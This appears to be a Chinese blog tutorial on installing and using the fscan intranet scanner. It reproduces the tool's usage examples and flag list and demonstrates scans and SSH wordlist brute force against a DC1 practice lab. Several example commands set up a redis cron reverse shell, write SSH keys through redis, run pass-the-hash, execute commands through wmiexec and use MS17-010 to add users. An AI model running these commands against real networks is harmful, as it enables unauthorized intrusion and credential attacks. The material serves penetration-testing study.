内网主动信息收集之使用fscan进行漏洞扫描

内网主动信息收集之使用fscan进行漏洞扫描

fscan官方简介

下载链接:https://github.com/shadow1ng/fscan

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能

Releases版配置

由于Releases版不需要编译等操作,所以我们直接使用即可。为了方便,我们也是直接配置环境变量以供快速启动:

  • 确定文件位置,我这里使用自定义的/usr/self
mkdir /usr/self   # 创建文件夹
cp /path/fscan /usr/self/fscan	# 迁移文件至自定义文件夹
chmod +x /usr/self/fscan		# 添加可执行权限
  • 配置环境变量

使用如下指令,在当前用户的环境变量中追加框中语句:

vim ./.zshrc

内网主动信息收集之使用fscan进行漏洞扫描_第1张图片

使用 source ~/.zshrc刷新环境变量后,输入fscan即可看到如下内容:

内网主动信息收集之使用fscan进行漏洞扫描_第2张图片

简单使用

注意:此条目来自作者github页面:https://github.com/shadow1ng/fscan

直接运行fscan将会看到,其所有可用操作命令及其描述,并且在其github页面中作者也留有标准示例与指令详情:

fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
fscan.exe -h 192.168.1.1/16  (B段扫描)

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)

所以我们直接使用靶场机来展示其在渗透时的作用

靶场DC1演示漏扫

  • 内网存活主机探测(这里我选择使用hn选项跳过了我的物理机)
fscan -h 10.0.2.0/24 -nobr -nopoc -hn 10.0.2.2  # 注意扫描端口开闭是自动的

内网主动信息收集之使用fscan进行漏洞扫描_第3张图片

  • 使用全模块扫描目标
fscan -h 10.0.2.15

内网主动信息收集之使用fscan进行漏洞扫描_第4张图片

在扫描完成确定了端口后,fscan将会自动进行漏扫,并报告可用poc,发现ssh会自动进行尝试一定的爆破

  • 对指定端口进行漏扫
fscan -h 10.0.2.5 -p 80

内网主动信息收集之使用fscan进行漏洞扫描_第5张图片

  • 将报告保存到相应的文件中
fscan -h 10.0.2.5 -p 80 -o res.txt
  • 指定用户字典与密码字典进行ssh爆破
fscan -h 10.0.2.5 -m ssh -userf users.txt -pwdf pass.txt  # m选项用于选择扫描模式,默认为all

内网主动信息收集之使用fscan进行漏洞扫描_第6张图片

fscan命令详情

注意:此条目来自作者github页面:https://github.com/shadow1ng/fscan

  -c string
        ssh命令执行
  -cookie string
        设置cookie
  -debug int
        多久没响应,就打印当前进度(default 60)
  -domain string
        smb爆破模块时,设置域名
  -h string
        目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
        读取文件中的目标
  -hn string
        扫描时,要跳过的ip: -hn 192.168.1.1/24
  -m string
        设置扫描模式: -m ssh (default "all")
  -no
        扫描结果不保存到文件中
  -nobr
        跳过sql、ftp、ssh等的密码爆破
  -nopoc
        跳过web poc扫描
  -np
        跳过存活探测
  -num int
        web poc 发包速率  (default 20)
  -o string
        扫描结果保存到哪 (default "result.txt")
  -p string
        设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
  -pa string
        新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
  -path string
        fcgi、smb romote file path
  -ping
        使用ping代替icmp进行存活探测
  -pn string
        扫描时要跳过的端口,as: -pn 445
  -pocname string
        指定web poc的模糊名字, -pocname weblogic
  -proxy string
        设置代理, -proxy http://127.0.0.1:8080
  -user string
        指定爆破时的用户名
  -userf string
        指定爆破时的用户名文件
  -pwd string
        指定爆破时的密码
  -pwdf string
        指定爆破时的密码文件
  -rf string
        指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
  -rs string
        redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
  -silent
        静默扫描,适合cs扫描时不回显
  -sshkey string
        ssh连接时,指定ssh私钥
  -t int
        扫描线程 (default 600)
  -time int
        端口扫描超时时间 (default 3)
  -u string
        指定Url扫描
  -uf string
        指定Url文件扫描
  -wt int
        web访问超时时间 (default 5)
  -pocpath string
        指定poc路径
  -usera string
        在原有用户字典基础上,新增新用户
  -pwda string
        在原有密码字典基础上,增加新密码
  -socks5
        指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)
  -sc 
        指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)

你可能感兴趣的:(网络安全)